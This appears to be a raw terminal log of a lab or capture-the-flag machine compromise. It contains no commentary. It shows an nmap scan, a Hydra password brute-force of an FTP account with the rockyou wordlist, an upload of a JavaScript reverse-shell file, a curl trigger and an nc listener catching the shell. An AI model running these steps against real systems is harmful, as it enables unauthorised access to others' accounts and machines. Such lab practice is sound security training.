nmap -p 21,3000 -sCV -vv 192.168.0.146 -oA targeted
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.0.8 or later
3000/tcp open http syn-ack Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
ftp 192.168.0.146
Connected to 192.168.0.146.
220 "Hello a.clark, Welcome to your FTP server."
hydra -t 64 -l a.clark -P /usr/share/wordlists/rockyou.txt ftp://192.168.0.146
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-23 22:32:01
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.0.146:21/
[21][ftp] host: 192.168.0.146 login: a.clark password: dragon
ftp 192.168.0.146
Connected to 192.168.0.146.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.0.146:parrot): a.clark
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put rev.js
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
192 bytes sent in 0,000114 seconds (1,61 Mbytes/s)
curl -s http://192.168.0.146:3000/rev.js
nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 192.168.0.146 42794
id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)
a.clark@lower7:~$ ls
user.txt
a.clark@lower7:~$ cat user.txt